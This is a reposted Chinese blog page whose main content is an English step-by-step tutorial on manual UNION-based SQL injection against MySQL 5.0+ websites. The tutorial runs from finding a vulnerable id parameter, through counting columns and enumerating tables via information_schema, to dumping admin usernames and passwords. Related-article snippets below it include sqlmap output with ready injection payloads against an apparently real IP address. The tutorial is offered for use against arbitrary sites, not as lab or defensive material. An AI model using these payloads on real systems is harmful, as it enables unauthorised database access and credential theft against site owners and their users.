[Injection]对MYSQL 5.0服务器以上版本注入

最新推荐文章于 2024-09-07 20:44:48 发布
转载 最新推荐文章于 2024-09-07 20:44:48 发布 · 829 阅读 · 0
文章标签:

#mysql #服务器 #table #sql server #hex #numbers

本文介绍了一种针对MySQL Server 5.0+版本的SQL注入攻击方法。通过逐步指导读者如何发现并利用网站上的SQL注入漏洞,包括定位易受攻击的位置、获取数据库版本信息、列出所有表名及列名,最终读取特定表中的数据。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

by ZaraByte

How to do a SQL Injection for MYSQL Server 5.0+

1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error

2. order by #–

Keep upping the # until you get an error.

3. union all select 1,#,#,#,#,#–

Above 6 numbers if the site you have shows more then 6 or less then since you need to add or remove them

4. Find a column # that is showed from step 2 example if there are 5 columns shown you can pick column 2

5. concat_ws(0×3A,version(),@@version) in vulnerable column

add concat_ws(0×3A,version(),@@version) to a vulnerable column like column 2 see if it shows the SQL version if it don’t try adding a – before the php?id=-# and see if you get the version

Will show the version of the SQL Server recommended that it be 5.0

6. union all select 1,group_concat(table_name),#,#,#,# from information_schema.tables where table_schema=database()–

This selects all the the tables from the database.

7. Find a table your after like admin or like users or user whatever table you wanna see

8. union all select 1,group_concat(column_name),#,#,#,# from information_schema.columns where table_name=char(x)–

Replace x with the ASCII of table name You will need to convert Text to ASCII.

9. union all select 1,group_concat(table_name,0×3a,table_name)#,#,#,# from column_name–

Replace table_name with the table name your after the 0×3a is hex for “:” table_name would be replaced with the other table name yours after

so for example say you found a table named admin and you wanna see the username and password columns you’d do

union all select 1,group_concat(username,0×3a,password,0×3c62723e)#,#,#,# from table_name–
Basically its going to show the username 0×3a is hex for “:” then the password 0×3c62723e is hex for a “< br >” which breaks them down in displaying, be sure to change the table_name to the name of the table so say your going for admin change the table_name– to admin–

after that you will either get the username and password in plain text or it will be hashed.
just so you know change the # signs to the ammount of rows you get in Step 3 if you have 2 rows it should be 1,2 or you have 5 rows it should be 1,2,3,4,5 and so on.

Side note may need to add a – between like the thefilename.php?id=-#

So if a website has 5 rows you’d add all 5 rows the last number don’t add a “,”

Unfinished Tutorial Wrote by ZaraByte

 

sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2724
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
mysql 5.0 注入 区别_MySQL注入总结
weixin_33166692的博客
01-19 2168
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型和访问权限等。而5.0以下没有。information_schema系统数据库,记录当前数据库的数据库,表,列,用户权限信息SCH...
mysql5.0注入_[Injection]对MYSQL 5.0服务器以上版本注入
weixin_42376799的博客
02-05 214
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error2. ord...
Mysql5.0以下 手工注入
weixin_30585437的博客
05-12 826
order by 20 www. .com/product/introduction.php?id=-65 UNION SELECT user(),2 www. .com/product/introduction.php?id=-65 UNION SELECT @@versions,2 报错 Warning: mysql_fetch_array() expects parame...
MYSQL注入
Khazking的博客
11-19 615
注:MYSQL5.0以上为高版本,5.0以下为低版本 MYSQL相关知识 1.MYSQL数据库 数据库A=网站A=数据库用户A 表名 列名 数据 数据库B=网站B=数据库用户B 。。。。。。 数据库C=网站C=数据库用户C 。。。。。。 2.MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它...
MySQL数据库的SQL注入漏洞解析
CoffeMilk的博客
09-07 1527
SQL注入总结起来就是:没有对用户输入提交的数据内容的合法性进行严格的判断或过滤,就直接将这些伪造的数据内容带入到数据库执行,导致数据泄露或损坏,甚至导致完全接管主机的一种安全漏洞。
SQL注入(没有原理,分类payload)
weixin_46709219的博客
08-13 935
一)关于数据库的一些基本知识: MySQL5.0以下,没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 MySQL5.0以上,MySQL中默认添加了一个名为 information_schema 的数据库,该数据库中的表都是只读的,不能进行更新、删除和插入等操作,也不能加载触发器,因为它们实际只是一个视图,不是基本表,没有关联的文件。 mysql中注释符: 单行注释:#       多行注释:/**/ information_schema数据库中三个很重要的表: 1)in
《小迪安全》第13天 SQL注入Mysql注入
m0_56250796的博客
04-20 349
select 关键字过滤 $id = str_replace('select', 'fuck', $id) 但有时过滤关键字没有做大小写防护可以换 Select、SELECT尝试。
【THM】SQL InjectionSQL注入)-初级渗透测试
追风少年亚索的博客
03-29 2382
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
DVWA系列(六)——使用Burpsuite进行SQL InjectionSQL注入
热门推荐
橘子女侠
05-06 1万+
1. SQL注入简介 (1)SQL注入漏洞原理 将恶意的SQL语句拼接到合法的语句中,从而达到执行SQL语句的目的; (2)SQL注入漏洞类型 字符型; 数字型; 搜索型; (3)SQL注入的过程 判断是否存在注入注入是字符型还是数字型; 猜解SQL查询语句中的字段数; 确定显示位置; 获取当前数据库;获取数据库中表; 获取表中的字段名; 下载数据; 2....
Mysql5.0以上 手工注入
weixin_30498921的博客
05-12 183
Mysql5.0以上 order by 23 http://www..com/productdet.php?&id=89 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,database(),11,12,13,14,15,16,17,18,19,20,21,22 http://www..com/productdet.php?&i...
MySQL5.0及以上和5.0以下有什么区别】
qq_55213436的博客
06-15 5654
最近也是在一直在牛牛上看各个公司的以往校园招聘的笔试和面试题目,发现这样一道有意思的问题:mysql5.05.0以下的版本有什么区别?我发现这个问题看是简单,但是里面包含的门道却是很多。 ......
mysql5.0版本以上和mysql5.0版本以下的区别
m0_56065966的博客
03-18 1972
mysql5.0版本以上和mysql5.0版本以下的区别
SQL注入MYSQL注入
qq_46047977的博客
09-14 396
information_schema MYSQL5.0以上版本中,再带一个名为information_schema的数据库,这个数据库存储这所有数据库名,表名和列名,可通过此数据库查询指定数据库下的表明和列名。 mysql> use information_schema; Database changed mysql> show tables; +---------------------------------------+ | Tables_in_information_schema
mysql 5.0 注入 区别_■Ascii逐字解码法注入mysql5.0一下版本手工注入
weixin_39942492的博客
01-27 233
/*By:珍惜少年时*/逐字解码法,不一定非要猜字段内容。库名,表名,字段,data,都能猜。环境过滤了select、union(mysql5.0以下的版本就不支持union所以也可以用此方法),你可以用这方法。exists只是其中一种,还有别的方法也能猜。注:mysql不支持top函数,请使用limit函数注入思路:先把表跟字段猜解出来,猜解出来了.这个算是一个半猜解查询吧00x1判断表是否存在...
以下哪些是mysql注入类型_SQL注入的那些面试题总结
weixin_39902472的博客
02-11 756
一、知识储备类1.SQLNoSQL的区别?SQL:关系型数据库NoSQL:非关系型数据库存储方式:SQL具有特定的结构表,NoSQL存储方式灵活 性能:NoSQL较优于SQL 数据类型:SQL适用结构化数据,如账号密码;NoSQL适用非结构化数据,如文章、评论2.常见的关系型数据库?mysqlsqlserver、oracle、access、sqlite、postgreSQL3.常见的数据库端口...
[第五空间-2021]yet_another_mysql_injection
liaochonxiang的博客
04-24 401
password输入必须和数据库中查询到的一样。username必须为admin。
CTFHUB 2021-第五空间 yet_another_mysql_injection
Jay17的博客
07-05 1507
CTFHUB 2021-第五空间 yet_another_mysql_injection
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1998
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
D:\WpSystem\S-1-5-21-589763762-2765656899-3959673489-1001\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.11_qbz5n2kfra8p0\sqlmap>python sqlmap.py -u http://223.112.5.141:64701/ --data "uname=1*&passwd=1"--dbs ___ __H__ ___ ___[(]_____ ___ ___ {1.9.1.2#dev} |_ -| . ["] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:25:21 /2025-07-21/ custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q] y [15:25:23] [INFO] resuming back-end DBMS 'mysql' [15:25:23] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: uname=1') RLIKE (SELECT (CASE WHEN (1315=1315) THEN 1 ELSE 0x28 END))-- zswx&passwd=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: uname=1') AND (SELECT 9615 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(9615=9615,1))),0x7170766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jjis&passwd=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uname=1') AND (SELECT 8466 FROM (SELECT(SLEEP(5)))PVEU)-- xERO&passwd=1 --- [15:25:23] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [15:25:23] [INFO] fetched data logged to text files under 'C:\Users\xxxxxxxxxxxxxxxxxxxx\AppData\Local\sqlmap\output\223.112.5.141'什么意思
最新发布
07-22
版本信息很重要,因为某些注入技术只适用于特定版本(例如,时间盲注需要 MySQL 5.0.12 以上)[^3][^4]。 - **注意**:如果未找到注入点,日志会显示 `no injection point detected`,并建议调整参数(如使用 `--...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值